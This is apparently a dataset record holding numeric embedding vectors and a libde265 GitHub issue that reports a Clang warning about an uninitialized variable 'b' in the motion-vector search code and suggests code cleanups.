-0.02924170531332493, -0.005383198149502277, -0.0323716402053833, 0.014736776240170002, -0.013526824302971363, 0.004495658446103334, 0.006661979015916586, 0.007375633344054222, 0.003446913091465831, -0.008339247666299343, 0.009128976613283157, 0.012432795949280262, -0.00028686539735645056, 0.009020297788083553, 0.016171328723430634, -0.00951297301799059, 0.011990837752819061, 0.012056045234203339, 0.0003153934667352587, -0.025575624778866768, 0.017142189666628838, 0.011143147014081478, 0.00005071653504273854, -0.012541474774479866, 0.02006925828754902, -0.0003215066099073738, 0.003131746081635356, -0.006988014094531536, -0.014135423116385937, -0.014077461324632168, -0.0433843731880188, 0.0019978692289441824, 0.016620533540844917, 0.011816952377557755, -0.0036008739843964577, -0.0007987854187376797, 0.011577860452234745, 0.011730009689927101, 0.009128976613283157, 0.009759310632944107, -0.011222844943404198, 0.006748921703547239, 0.010708434507250786, -0.009520217776298523, -0.001961643109098077, -0.04144265502691269, 0.01806957647204399, 0.004716637544333935, 0.008107400499284267, -0.017620373517274857, 0.005437537096440792, -0.0015903256135061383, 0.009230409748852253, -0.005303500685840845, -0.005241916049271822, -0.02241670899093151, -0.02467721700668335, 0.017040755599737167, 0.010824358090758324, 0.01351957954466343, 0.01091854553669691, 0.01370070967823267, -0.006198285147547722, -0.02924170531332493, -0.013787652365863323, 0.012447286397218704, 0.004705769941210747, 0.012621171772480011, 0.0009355389629490674, 0.004894145764410496, -0.009078259579837322, -0.0091434670612216, 0.004242076072841883, 0.012121251784265041, 0.005191199481487274, -0.02351798117160797, 0.000810558907687664, 0.0010098024504259229, -0.01383112370967865, -0.022663045674562454, -0.0089333551004529, -0.0013738747220486403, -0.006759789772331715, -0.017837729305028915, -0.0019815675914287567, 0.018055086955428123, 0.011447446420788765, 0.005959192756563425, -0.0013539503561332822, -0.009621650911867619, 0.021547282114624977, 0.010512812994420528, 0.013802142813801765, -0.005980928428471088, -0.004060945473611355, -0.008404454216361046, -0.0009029354550875723, 0.011889404617249966, -0.021228492259979248, 0.025575624778866768, 0.0074082366190850735, 0.03016909398138523, -0.02666240744292736, -0.0169827938079834, 0.009723084047436714, 0.025503171607851982, 0.030198074877262115, -0.015519259497523308, 0.001180970692075789, -0.025430720299482346, 0.015780087560415268, -0.00007098050991771743, -0.008998562581837177, -0.014302062802016735, -0.005959192756563425, -0.018634704872965813, -0.006466358434408903, -0.03866048902273178, 0.012751585803925991, 0.0021916788537055254, -0.01570763625204563, -0.000606787099968642, -0.024213522672653198, 0.006129455752670765, -0.026850782334804535, 0.014381760731339455, 0.0015803634887561202, -0.009223164059221745, 0.0012778755044564605, 0.017736297100782394, 0.009375314228236675, 0.009853498078882694, -0.019243301823735237, 0.0074082366190850735, -0.022923873737454414, -0.014244101010262966, 0.012106761336326599, 0.015388845466077328, -0.020880721509456635, -0.014454212971031666, 0.0018131161341443658, -0.008426190353929996, 0.014765757136046886, -0.0019163604592904449, 0.0045499978587031364, 0.008078419603407383, -0.011208354495465755, -0.00729593588039279, -0.0010415002470836043, -0.00963614135980606, 0.002394544892013073, 0.014823718927800655, 0.006437377538532019, -0.036226097494363785, -0.002486921614035964, 0.0015513825928792357, -0.00880294106900692, 0.004231208004057407, 0.013084866106510162, -0.015156999230384827, 0.03431335836648941, 0.03170508146286011, 0.002370998030528426, 0.005049917846918106, -0.0002021869004238397, -0.008527623489499092, 0.0022061693016439676, 0.01540333591401577, -0.004075435921549797, 0.012766076251864433, 0.023503491654992104, -0.018040595576167107, -0.000017547015886520967, 0.0020558310206979513, 0.0044920360669493675, 0.013635503128170967, 0.0310674998909235, 0.003517553908750415, -0.002387299668043852, -0.002887219889089465, -0.009418785572052002, 0.005807043053209782, 0.013976028189063072, -0.016040915623307228, -0.02363390475511551, -0.004821693524718285, -0.0020449631847441196, 0.00675616692751646, -0.0043616220355033875, 0.005071653518825769, 0.012787812389433384, 0.013128337450325489, 0.0011365937534719706, -0.021779129281640053, -0.007006126921623945, 0.0000742068950785324, -0.0026571841444820166, 0.01388183981180191, -0.020446008071303368, -0.0005352405714802444, -0.0027948433998972178, 0.036805715411901474, -0.006147568579763174, -0.005520856939256191, 0.009541953913867474, 0.016736457124352455, 0.007694422733038664, -0.030227055773139, 0.017953652888536453, -0.0029995208606123924, -0.001311384723521769, 0.006328699178993702, 0.003162538167089224, 0.008368228562176228, 0.00529263261705637, 0.00943327508866787, 0.004010228905826807, -0.03755921870470047, 0.015548240393400192, -0.0028509937692433596, -0.0011646690545603633, 0.006937297526746988, -0.0024162805639207363, -0.015374355018138885, -0.022257313132286072, -0.012012573890388012, -0.002494166838005185, 0.0020703214686363935, -0.01078813150525093, -0.008781205862760544, 0.0019815675914287567, -0.0016700230771675706, 0.02414107136428356, 0.002687976462766528, -0.014577381312847137, 0.01267913356423378, 0.004640562925487757, -0.004281924571841955, -0.017982633784413338, 0.010693944059312344, -0.006828619167208672, 0.004868787247687578, -0.0015278356149792671, -0.001437270431779325, -0.002034095348790288, 0.004223962780088186, -0.0024905442260205746, -0.00348495040088892, 0.018301423639059067, 0.006216397974640131, 0.01052730344235897, 0.01553374994546175, 0.030198074877262115, -0.0034124983940273523, 0.02577849105000496, 0.0018267008708789945, 0.0017334186704829335, -0.019576583057641983, -0.015171489678323269, -0.009230409748852253, -0.00209024571813643, -0.028314316645264626, 0.013244261033833027, -0.006089606788009405, 0.008498642593622208, 0.005234670825302601, -0.01985190063714981, -0.015620692633092403, -0.016997285187244415, 0.0018312291940674186, 0.00843343511223793, 0.0077306488528847694, -0.005792553070932627, 0.0020612648222595453, 0.008904374204576015, 0.010809867642819881, -0.013063129968941212, 0.0006579564651474357, 0.010933035984635353, 0.006940919905900955, 0.0029469928704202175, -0.016432156786322594, -0.02063438482582569, -0.00046958078746683896, -0.009476746432483196, -0.023170212283730507, -0.01686687022447586, -0.004539129789918661, -0.012526984326541424, 0.008629056625068188, -0.00976655539125204, 0.022663045674562454, 0.01776527799665928, -0.006604017224162817, 0.02812594175338745, 0.017301583662629128, 0.00650982977822423, -0.006017154548317194, 0.01540333591401577, -0.016649514436721802, -0.009317352436482906, -0.007013372145593166, -0.010259230621159077, -0.026792820543050766, -0.01060700137168169, -0.02787960320711136, -0.009005807340145111, 0.02159075438976288, 0.015968462452292442, 0.020808270201086998, -0.007049598265439272, -0.009368068538606167, -0.007636460941284895, 0.006839487235993147, 0.00906376913189888, -0.00331287644803524, -0.013034150004386902, -0.008578339591622353, -0.012881999835371971, 0.0017225508345291018, 0.010838848538696766, -0.011512653902173042, -0.025430720299482346, 0.0020232275128364563, -0.002602844964712858, 0.01943167857825756, -0.01598295383155346, 0.001029726816341281, -0.001029726816341281, -0.014715040102601051, -0.013534069992601871, -0.013505089096724987, -0.008100154809653759, 0.021286454051733017, 0.012874755077064037, 0.0005479197134263813, -0.007890043780207634, 0.017417507246136665, 0.0017687391955405474, 0.0045029036700725555, -0.02143135853111744, -0.0077958558686077595, 0.008208833634853363, -0.013352938927710056, -0.004568110685795546, -0.02273549884557724, -0.007393746171146631, -0.005031805019825697, -0.013910820707678795, -0.015475788153707981, -0.007368388120085001, 0.010628736577928066, 0.00650982977822423, -0.01770731620490551, 0.00644462276250124, 0.014135423116385937, 0.0025720528792589903, -0.0015876087127253413, 0.004329018760472536, 0.0166060421615839, 0.006455490365624428, -0.021909542381763458, -0.00906376913189888, 0.01738852635025978, 0.03231367841362953, -0.010056364350020885, -0.007919024676084518, 0.03042992204427719, -0.02006925828754902, -0.0042275856249034405, 0.020243143662810326, 0.014026744291186333, 0.0021083587780594826, 0.012411060743033886, -0.022039957344532013, 0.010447606444358826, -0.027966545894742012, 0.001885568373836577, -0.001029726816341281, 0.01666400395333767, -0.0010161419631913304, -0.0013756860280409455, -0.014613606967031956, 0.033501893281936646, 0.010223004035651684, -0.018504289910197258, 0.004463055171072483, -0.0036697036121040583, 0.009165202267467976, -0.025546643882989883, 0.016910342499613762, 0.003358159214258194, 0.009469501674175262, 0.009969421662390232, -0.03776208311319351, 0.00021418680262286216, 0.007716158404946327, -0.0013892707647755742, 0.011722764931619167, 0.015794578939676285, 0.002227904973551631, -0.017475469037890434, 0.019678015261888504, 0.0055896867997944355, 0.00028867670334875584, 0.006506206933408976, 0.0020196049008518457, 0.004118907265365124, -0.008759469725191593, 0.009527463465929031, -0.0038327209185808897, -0.0032078209333121777, -0.002860050415620208, 0.014164404012262821, 0.011577860452234745, -0.014157158322632313, -0.023662885650992393, -0.005307123064994812, -0.006549678277224302, 0.02022865228354931, 0.006238133646547794, 0.0041152844205498695, -0.04480443522334099, -0.0077958558686077595, 0.022547122091054916, 0.011070694774389267, 0.0043036602437496185, 0.005433914717286825, -0.01796814426779747, -0.039211127907037735, -0.012541474774479866, -0.017272602766752243, -0.0015187790850177407, -0.0033472913783043623, 0.008868148550391197, -0.007372010499238968, -0.006857600063085556, -0.0033201216720044613, -0.007357520051300526, -0.003292952198535204, 0.0018004369921982288, 0.008143626153469086, 0.003291140776127577, -0.01071567926555872, 0.005191199481487274, 0.0028455599676817656, 0.016011934727430344, 0.00956368912011385, -0.023170212283730507, 0.023445529863238335, 0.004528262186795473, 0.00024611104163341224, 0.017953652888536453, -0.02143135853111744, 0.0071981255896389484, -0.008259549736976624, -0.008984072133898735, -0.0014417986385524273, 0.011396730318665504, -0.00919418316334486, 0.000017914937416207977, -0.013171808794140816, 0.013012413866817951, -0.00932459719479084, -0.005093389190733433, -0.01838836632668972, 0.03411049395799637, -0.011251825839281082, 0.022387728095054626, 0.02064887434244156, 0.005502744112163782, -0.004223962780088186, 0.0064989617094397545, -0.004876032471656799, 0.014671568758785725, -0.013548560440540314, 0.00793351512402296, 0.027285495772957802, 0.007752384524792433, -0.003350913990288973, 0.002640882506966591, 0.004763731732964516, 0.02656097337603569, -0.018084067851305008, 0.013505089096724987, 0.004713015165179968, 0.00008252757834270597, -0.002505034673959017, -0.006393906194716692, -0.018040595576167107, -0.022807950153946877, -0.00036746845580637455, 0.0019254169892519712, 0.0018620213959366083, 0.004622450098395348, 0.005546215455979109, 0.03358883783221245, 0.008208833634853363, -0.013063129968941212, -0.002865484217181802, 0.0022387728095054626, -0.022199351340532303, -0.0009269352303817868, 0.02630014531314373, 0.002774918917566538, 0.007766874972730875, -0.005144105758517981, -0.00997666735202074, -0.006651111412793398, 0.0005524479784071445, -0.010520058684051037, 0.0072850678116083145, -0.015649674460291862, -0.00355015741661191, 0.0003090538957621902, -0.006227266043424606, -0.01766384392976761, 0.0038109852466732264, -0.002564807655289769, 0.00043358109542168677, 0.0038363435305655003, -0.012135742232203484, 0.00017399847274646163, -0.016461137682199478, 0.0036207984667271376, 0.0038182304706424475, -0.009418785572052002, 0.02461925521492958, 0.02890842594206333, -0.027227533981204033, 0.004408715758472681, 0.024271484464406967, 0.01875062845647335, 0.0021463963203132153, -0.03016909398138523, -0.0057780626229941845, 0.003370838239789009, -0.00984625332057476, 0.004158755764365196, -0.0026970328763127327, -0.011432955972850323, -0.02085174061357975, 0.027111610397696495, 0.008288530632853508, 0.006676469463855028, 0.00843343511223793, -0.025503171607851982, 0.023749828338623047, -0.001711683114990592, 0.01086782943457365, 0.0011891216272488236, 0.0025032232515513897, -0.024648236110806465, -0.0033146878704428673, 0.01776527799665928, 0.0034052531700581312, -0.0010741037549450994, 0.007694422733038664, -0.017881201580166817, -0.008773960173130035, -0.017069736495614052, -0.02630014531314373, -0.007143786177039146, -0.0033020086120814085, 0.011186618357896805, 0.0019525865791365504, 0.003075595712289214, -0.0034559695050120354, 0.012997923418879509, 0.02269202657043934, -0.027995526790618896, -0.017750786617398262, 0.0013023281935602427, 0.0004261094727553427, 0.0017044378910213709, -0.009230409748852253, 0.003608119208365679, -0.008505887351930141, 0.00862181093543768, 0.018779609352350235, 0.0101940231397748, -0.003995738457888365, -0.01204879954457283, -0.00551361171528697, 0.0225761029869318, 0.03857354819774628, -0.007636460941284895, -0.010498322546482086, 0.012860264629125595, 0.0084913969039917, -0.005828778725117445, -0.015070056542754173, -0.010172287933528423, 0.005314368288964033, 0.021561773493885994, -0.016953812912106514, 0.007122050505131483, -0.011990837752819061, -0.005814288277179003, -0.012722604908049107, 0.016214800998568535, 0.007976986467838287, 0.005796175450086594, 0.006919184233993292, 0.007161899469792843, -0.0013403656193986535, -0.013128337450325489, -0.015214961022138596, -0.005549837835133076, -0.008730488829314709, -0.003298386000096798, 0.018257953226566315, 0.001505194348283112, 0.018040595576167107, 0.021199511364102364, -0.005814288277179003, -0.00716552184894681, 0.032661449164152145, 0.016432156786322594, 0.0004412791458889842, 0.012693624012172222, -0.006020777393132448, -0.008317511528730392, 0.022547122091054916, 0.0061004748567938805, 0.010947526432573795, 0.0021156040020287037, 0.007064088713377714, 0.008875393308699131, -0.009114486165344715, 0.013613766990602016, -0.006701827980577946, -0.00548825366422534, -0.014686059206724167, -0.000357506301952526, 0.028314316645264626, 0.012881999835371971, -0.004394225310534239, 0.00976655539125204, 0.018272442743182182, 0.03263246640563011, -0.00611858768388629, -0.0014562890864908695, -0.019083907827734947, 0.013599276542663574, 0.01364999357610941, -0.026633426547050476, 0.004850674420595169, -0.0052781421691179276, 0.008759469725191593, -0.016040915623307228, 0.01724362187087536, -0.007346652448177338, -0.007223483640700579, -0.006774280220270157, -0.0008046721923165023, -0.00971583928912878, 0.018243461847305298, -0.007060466334223747, 0.0036117418203502893, 0.019678015261888504, -0.00710031483322382, -0.0030502374283969402, 0.014236856251955032, 0.0004913164302706718, 0.012555965222418308, -0.032139793038368225, -0.003423366229981184, -0.008969581685960293, -0.015504769049584866, -0.011701028794050217, -0.008853658102452755, 0.0041152844205498695, 0.007520537823438644, -0.01922881230711937, 0.007846572436392307, -0.01115763746201992, 0.005520856939256191, 0.003111821599304676, 0.011193864047527313, -0.03086463361978531, 0.02075030840933323, 0.004267434123903513, 0.005549837835133076, 0.009121730923652649, -0.0005275425501167774, -0.013860104605555534, -0.03344393149018288, -0.025271324440836906, 0.008527623489499092, -0.006799638271331787, -0.011628576554358006, 0.0007847478264011443, -0.0009735763305798173, -0.002620958024635911, -0.005086143966764212, -0.0014744021464139223, -0.014490438625216484, 0.02001129649579525, -0.0022804327309131622, 0.0025140910875052214, 0.009730329737067223, 0.00280933384783566, 0.009723084047436714, 0.030980557203292847, -0.006611262448132038, 0.01680890843272209, -0.015156999230384827, 0.005064408294856548, -0.010404135100543499, -0.010027383454144001, -0.011577860452234745, 0.0009418785339221358, -0.006198285147547722, -0.00919418316334486, -0.005872250068932772, -0.012374834157526493, -0.01440349593758583, 0.004930371884256601, 0.03773310035467148, -0.01270086970180273, -0.007766874972730875, 0.004984710831195116, -0.007154654245823622, 0.008281285874545574, -0.005183954257518053, -0.0032820843625813723, -0.0028002772014588118, -0.01817101053893566, 0.02121400274336338, -0.01034617330878973, 0.0014318365138024092, -0.015606202185153961, -0.009860743768513203, 0.007701667957007885, 0.012657398357987404, -0.033183105289936066, 0.0020304727368056774, 0.01364999357610941, -0.013642747886478901, 0.01634521409869194, -0.01722913235425949, 0.023706357926130295, -0.0009907837957143784, -0.006397528573870659, 0.00862181093543768, 0.008317511528730392, -0.007694422733038664, 0.01301965955644846, 0.004810825455933809, -0.007629215717315674, -0.0051368605345487595, -0.007571254391223192, 0.0039015505462884903, -0.006350434850901365, -0.017562411725521088, -0.013497843407094479, -0.03028501756489277, -0.024184541776776314, -0.006267114542424679, -0.013664484024047852, -0.002046774374321103, 0.0012380268890410662, -0.013215280137956142, -0.007448085583746433, -0.016316233202815056, -0.013925311155617237, 0.00291982339695096, 0.02866208739578724, -0.015055566094815731, -0.005520856939256191, -0.00470214756205678, -0.006259869318455458, -0.006542433053255081, 0.049325451254844666, -0.0010206702863797545, 0.03179202228784561, -0.00675616692751646, -0.013374675065279007, -0.0062417564913630486, -0.002968728542327881, -0.01672196574509144, -0.002414469374343753, -0.009056524373590946, -0.004042832180857658, -0.01165755745023489, 0.005173086654394865, -0.008230568841099739, -0.01614234782755375, -0.00006950882379896939, 0.013642747886478901, 0.002963294740766287, -0.008259549736976624, -0.022097919136285782, -0.00368057144805789, -0.005491876043379307, 0.01817101053893566, -0.01472228579223156, -0.0035791383124887943, 0.018257953226566315, 0.015794578939676285, -0.038167815655469894, -0.0027296363841742277, -0.00463694054633379, 0.023561453446745872, -0.006705450359731913, -0.008629056625068188, -0.012997923418879509, 0.002267753705382347, -0.002041340572759509, 0.013215280137956142, 0.020866231992840767, -0.026227694004774094, -0.006556923501193523, 0.008136381395161152, -0.013715200126171112, -0.0016283630393445492, 0.003908795770257711, -0.012345853261649609, 0.008339247666299343, -0.012411060743033886, 0.04894870147109032, 0.031357310712337494, 0.02309775911271572, -0.005557083059102297, 0.011483673006296158, 0.00450652651488781, 0.007364765275269747, -0.00038603434222750366, -0.01776527799665928, 0.019880881533026695, -0.009607160463929176, -0.03286431357264519, -0.003526610555127263, -0.010520058684051037, 0.0008594641694799066, -0.013642747886478901, -0.0238367710262537, -0.022126900032162666, -0.002687976462766528, 0.014787492342293262, 0.015678655356168747, -0.013418146409094334, 0.029560495167970657, -0.00045758087071590126, -0.009382558986544609, -0.010353418067097664, -0.03358883783221245, 0.005687497090548277, -0.02734345756471157, 0.009925950318574905, -0.01833040453493595, 0.011802461929619312, 0.0036316660698503256, -0.022097919136285782, -0.0045608654618263245, -0.00025041287881322205, -0.0004383357590995729, 0.00950572732836008, 0.01880859024822712, -0.0027803529519587755, -0.004698524717241526, -0.002776730339974165, -0.007774120196700096, 0.018982473760843277, 0.0056005544029176235, -0.01754792034626007, -0.02269202657043934, 0.027227533981204033, 0.002111981390044093, -0.003358159214258194, 0.00023999788390938193, -0.00013482900976669043, 0.009607160463929176, 0.00522742560133338, 0.0010288211051374674, -0.007212616037577391, 0.008810186758637428, 0.011693784035742283, -0.01586703024804592, 0.008846412412822247, -0.010534549131989479, -0.01440349593758583, 0.015388845466077328, 0.008781205862760544, 0.002202546689659357, -0.014149913564324379, 0.0037566462997347116, 0.016519099473953247, 0.012266156263649464, 0.02361941523849964, -0.02399616688489914, -0.0048144483007490635, 0.015446807257831097, -0.009317352436482906, -0.0003194688761141151, 0.012925471179187298, -0.002034095348790288, -0.014280327595770359, -0.008266795426607132, -0.002092057140544057, 0.01065771747380495, 0.03132832795381546, -0.01383112370967865, 0.00459709158167243, 0.004524639341980219, 0.016069896519184113, 0.018055086955428123, 0.022184861823916435, -0.005220180377364159, -0.006980768870562315, 0.019040435552597046, 0.00940429512411356, 0.010208513587713242, 0.001004368532449007, 0.017533430829644203, -0.0032694051042199135, -0.006220020819455385, -0.022547122091054916, 0.011179373599588871, 0.0006321453838609159, -0.0013249694602563977, -0.014381760731339455, 0.0059700608253479, 0.01891002245247364, 0.019199831411242485, -0.008179852738976479, -0.014374515041708946, 0.011201108805835247, 0.02703915908932686, 0.008129135705530643, 0.02693772502243519, -0.025517662987113, 0.015012094751000404, -0.0028129564598202705, 0.029372118413448334, -0.004658676218241453, -0.029212724417448044, 0.0009509350638836622, -0.001032443717122078, 0.011599596589803696, -0.005604177247732878, 0.031241385266184807, -0.00274412683211267, -0.027111610397696495, -0.00034301585401408374, 0.011353258974850178, -0.00799147691577673, 0.012541474774479866, 0.0033690270502120256, 0.011186618357896805, 0.009549198672175407, 0.028111450374126434, 0.009701348841190338, 0.013802142813801765, 0.03584934398531914, -0.022445689886808395, 0.007190880365669727, 0.023344095796346664, -0.009541953913867474, -0.015475788153707981, -0.008056683465838432, 0.02687976323068142, 0.011382239870727062, 0.02027212455868721, -0.02159075438976288, 0.003298386000096798, 0.015316393226385117, -0.009165202267467976, 0.028169412165880203, 0.010860583744943142, -0.00603526784107089, 0.01045485120266676, -0.01003462914377451, 0.01891002245247364, -0.014504929073154926, 0.005520856939256191, 0.006383038125932217 ]
183
null
null
null
null
null
null
null
null
null
[ "strukturag", "libde265" ]
This is based on the v1.0.8 sources. I see the following warning when compiling libde265-1.0.8: ``` libde265/encoder/algo/pb-mv.cc:228:24: warning: variable 'b' is uninitialized when used here [-Wuninitialized] else { b=abs_value(b+2); } ^ libde265/util.h:115:25: note: expanded from macro 'abs_value' #define abs_value(a) (((a)<0) ? -(a) : (a)) ^ libde265/encoder/algo/pb-mv.cc:224:10: note: initialize the variable 'b' to silence this warning int b; ^ = 0 libde265/encoder/algo/pb-mv.cc:217:24: warning: variable 'b' is uninitialized when used here [-Wuninitialized] else { b=abs_value(b+2); } ^ libde265/util.h:115:25: note: expanded from macro 'abs_value' #define abs_value(a) (((a)<0) ? -(a) : (a)) ^ libde265/encoder/algo/pb-mv.cc:213:10: note: initialize the variable 'b' to silence this warning int b; ^ = 0 ``` In the function `Algo_PB_MV_Search::analyze` in file `encoder/algo/pb-mv.cc`, lines 217 & 228 (`else { b=abs_value(b+2); }`) are incorrect as `b` is uninitialized. If `b` is assumed to be `0` then this should be `else { b = 2; }`. But, in the context of the function, that doesn’t look right. Also, it would be good to replace all usage of the abomination that is `abs_value` with `std::abs` :-). Additionally at line 206 in the same function you have: ``` double lambda = 10.0; double *bits_h = new double[2*hrange+1]; double *bits_v = new double[2*vrange+1]; ``` The use of `double` is unnecessary. This could be replaced with: ``` constexpr int lambda = 10; auto const bits_h = new int[2 * (hrange + vrange) + 2], bits_v = bits_h + 2 * hrange + 1; ``` and line 315 (`delete[] bits_v;`) removed. This would save memory, time & many redundant int → double → int conversions.
Clang: “warning: variable 'b' is uninitialized when used”
https://api.github.com/repos/strukturag/libde265/issues/285/comments
2
2021-01-28T19:01:47
2023-01-27T18:24:43Z
https://github.com/strukturag/libde265/issues/285
796,267,684
285
false
This is a GitHub Issue repo:libde265 owner:strukturag Title : Clang: “warning: variable 'b' is uninitialized when used” Issue date: --- start body --- This is based on the v1.0.8 sources. I see the following warning when compiling libde265-1.0.8: ``` libde265/encoder/algo/pb-mv.cc:228:24: warning: variable 'b' is uninitialized when used here [-Wuninitialized] else { b=abs_value(b+2); } ^ libde265/util.h:115:25: note: expanded from macro 'abs_value' #define abs_value(a) (((a)<0) ? -(a) : (a)) ^ libde265/encoder/algo/pb-mv.cc:224:10: note: initialize the variable 'b' to silence this warning int b; ^ = 0 libde265/encoder/algo/pb-mv.cc:217:24: warning: variable 'b' is uninitialized when used here [-Wuninitialized] else { b=abs_value(b+2); } ^ libde265/util.h:115:25: note: expanded from macro 'abs_value' #define abs_value(a) (((a)<0) ? -(a) : (a)) ^ libde265/encoder/algo/pb-mv.cc:213:10: note: initialize the variable 'b' to silence this warning int b; ^ = 0 ``` In the function `Algo_PB_MV_Search::analyze` in file `encoder/algo/pb-mv.cc`, lines 217 & 228 (`else { b=abs_value(b+2); }`) are incorrect as `b` is uninitialized. If `b` is assumed to be `0` then this should be `else { b = 2; }`. But, in the context of the function, that doesn’t look right. Also, it would be good to replace all usage of the abomination that is `abs_value` with `std::abs` :-). Additionally at line 206 in the same function you have: ``` double lambda = 10.0; double *bits_h = new double[2*hrange+1]; double *bits_v = new double[2*vrange+1]; ``` The use of `double` is unnecessary. This could be replaced with: ``` constexpr int lambda = 10; auto const bits_h = new int[2 * (hrange + vrange) + 2], bits_v = bits_h + 2 * hrange + 1; ``` and line 315 (`delete[] bits_v;`) removed. This would save memory, time & many redundant int → double → int conversions. --- end body ---
2,104
[ -0.03913648799061775, 0.01679176837205887, -0.004522848874330521, 0.0031881467439234257, 0.04371471703052521, 0.013845454901456833, -0.017692646011710167, 0.04120407626032829, -0.027868133038282394, 0.02219703420996666, -0.0014519267715513706, 0.021517682820558548, 0.0036219710018485785, 0.016097649931907654, -0.004404700826853514, 0.06421337276697159, 0.015108160674571991, 0.008986623026430607, -0.016599778085947037, -0.02529841661453247, 0.021945970132946968, -0.0185049120336771, -0.01782556250691414, 0.023673882707953453, -0.014569111168384552, -0.02348189242184162, -0.017914172261953354, 0.007908524014055729, -0.007122102193534374, -0.012390759773552418, 0.03349492698907852, -0.004829294979572296, -0.0612596794962883, -0.047879431396722794, 0.029994793236255646, 0.006029234267771244, 0.05417080596089363, 0.02947789803147316, -0.01464295294135809, 0.034056127071380615, -0.005512337200343609, -0.038604822009801865, -0.0288133155554533, -0.004220094531774521, -0.029093915596604347, 0.009688126854598522, 0.009931806474924088, 0.015846585854887962, -0.00762792257592082, -0.004866215866059065, -0.01661454699933529, -0.03875250741839409, 0.004858831875026226, -0.04028842970728874, -0.011334812268614769, -0.039579540491104126, -0.0068415007553994656, 0.04312397912144661, -0.004234863445162773, 0.034174274653196335, -0.020395278930664062, -0.0038213457446545362, -0.016880378127098083, 0.030172016471624374, 0.004101946949958801, 0.011999394744634628, -0.019258104264736176, 0.023083142936229706, -0.026169756427407265, 0.0027118632569909096, -0.015056471340358257, -0.015492141246795654, 0.007147946860641241, 0.04347842186689377, 0.02370341867208481, 0.005013900808990002, 0.038309451192617416, 0.020882638171315193, -0.025608554482460022, 0.00855095311999321, 0.007509774994105101, -0.0006211994332261384, -0.015506910160183907, -0.014716795645654202, 0.03039354272186756, 0.025682397186756134, 0.003961646463721991, -0.05786292627453804, -0.008011903613805771, 0.012302148155868053, -0.028961000964045525, 0.03621232509613037, 0.013823302462697029, -0.009894885122776031, -0.010308402590453625, 0.020838333293795586, -0.048381559550762177, -0.004652073141187429, -0.0643315240740776, 0.014716795645654202, -0.045752767473459244, 0.0037068899255245924, -0.004984363913536072, 0.016895147040486336, 0.01614195480942726, 0.010234560817480087, 0.023924946784973145, -0.003009079024195671, -0.004556077998131514, 0.10515161603689194, 0.016333945095539093, 0.0012783970450982451, 0.004866215866059065, -0.0009207227849401534, -0.005959083791822195, 0.031870391219854355, -0.0020325127989053726, -0.010330555960536003, 0.004308705683797598, -0.011571108363568783, -0.020661111921072006, -0.023792030289769173, -0.025135962292551994, -0.010168102569878101, -0.02473721280694008, 0.016333945095539093, 0.012804277241230011, -0.03390844166278839, 0.016407787799835205, -0.012855966575443745, -0.04220833256840706, -0.008048824965953827, 0.00335798435844481, -0.012420296669006348, -0.034292422235012054, -0.014510037377476692, 0.024456612765789032, 0.030836597084999084, 0.014938322827219963, -0.03960907831788063, -0.03875250741839409, -0.034174274653196335, 0.0215324517339468, 0.03813222795724869, 0.006948572583496571, 0.01801755279302597, -0.010832684114575386, 0.0068747298792004585, -0.008802017197012901, 0.017072368413209915, -0.024427074939012527, -0.009259840473532677, 0.043153513222932816, 0.0012857812689617276, 0.056563299149274826, -0.0022521940991282463, 0.012257843278348446, 0.0075171589851379395, 0.003219529753550887, -0.04604813829064369, -0.040849629789590836, -0.02038051001727581, 0.013631312176585197, -0.023304671049118042, -0.04483712092041969, -0.009769353084266186, 0.015506910160183907, 0.03718704730272293, -0.021369999274611473, 0.023304671049118042, 0.029064379632472992, 0.008617411367595196, 0.012656591832637787, 0.028961000964045525, -0.038604822009801865, -0.004504388198256493, -0.00276724505238235, 0.03148641064763069, -0.014546957798302174, -0.027513688430190086, -0.0005155124235898256, 0.020572500303387642, 0.03523760661482811, 0.004884676542133093, 0.014960476197302341, -0.029152991250157356, 0.03494223579764366, -0.018091395497322083, 0.04784989356994629, -0.029344981536269188, 0.03367214649915695, 0.014170361682772636, 0.016776999458670616, -0.017855098471045494, 0.028547482565045357, 0.005582487676292658, -0.027809057384729385, -0.028045354411005974, -0.012139694765210152, 0.012147079221904278, 0.017618803307414055, -0.015743205323815346, 0.016776999458670616, 0.018815049901604652, -0.03668491914868355, -0.00423117121681571, -0.024486148729920387, 0.02413170598447323, 0.0028853928670287132, -0.052369050681591034, 0.00402072025462985, 0.00015022318984847516, 0.0033358316868543625, 0.028060123324394226, 0.023437585681676865, 0.009156460873782635, -0.01606811210513115, 0.03074798732995987, -0.020513426512479782, -0.02432369627058506, 0.04495526850223541, -0.03494223579764366, 0.05272349342703819, 0.0007919600466266274, -0.06084616109728813, 0.01618625968694687, 0.00441208528354764, -0.0034632098395377398, -0.040436115115880966, -0.0023020377848297358, -0.0020417431369423866, 0.014295893721282482, 0.010286250151693821, -0.0036367394495755434, 0.021547220647335052, 0.022241339087486267, 0.01563982665538788, -0.0007776530692353845, -0.050921738147735596, -0.003701351583003998, -0.00535357603803277, 0.06391800194978714, -0.02984710969030857, -0.008994007483124733, 0.0009018006385304034, 0.0275875311344862, -0.010574235580861568, -0.002420185599476099, -0.04019981622695923, 0.028724703937768936, 0.0004919751663692296, -0.015492141246795654, 0.003662584349513054, 0.007731302175670862, -0.022064117714762688, 0.006487057078629732, 0.03184085339307785, 0.05830598250031471, -0.0015331533504649997, -0.0040059518069028854, 0.006845192983746529, 0.012759971432387829, -0.028488408774137497, -0.009776737540960312, 0.0006908882060088217, -0.01200677827000618, 0.016762230545282364, 0.005678482819348574, -0.010013033635914326, -0.04985840618610382, 0.039638616144657135, -0.033022332936525345, -0.0011593260569497943, -0.006579360458999872, -0.003503823187202215, 0.007790375966578722, 0.004965903237462044, 0.004131483845412731, -0.013505780138075352, -0.011312659829854965, -0.023245595395565033, 0.018947966396808624, 0.01407436653971672, 0.026775265112519264, 0.017087137326598167, -0.01373469177633524, -0.023068374022841454, -0.025460869073867798, -0.042296942323446274, -0.01364608108997345, 0.01971592754125595, 0.02018851973116398, -0.03730519488453865, 0.0291086845099926, 0.0028650860767811537, -0.010847453027963638, -0.005936931353062391, -0.010072107426822186, -0.022049348801374435, -0.0044637746177613735, -0.019804539158940315, -0.005013900808990002, 0.010817915201187134, -0.04214925691485405, -0.055706728249788284, 0.012479370459914207, 0.013269484043121338, 0.023216059431433678, 0.0044970037415623665, -0.04052472487092018, 0.014192515052855015, -0.00023341129417531192, 0.017544960603117943, -0.03384936973452568, -0.027868133038282394, 0.021030323579907417, -0.007184868212789297, -0.01070715207606554, -0.01649639755487442, 0.04471897333860397, -0.06379985809326172, 0.026598041877150536, -0.045575547963380814, 0.0003989798715338111, 0.0003147533570881933, -0.01893319934606552, 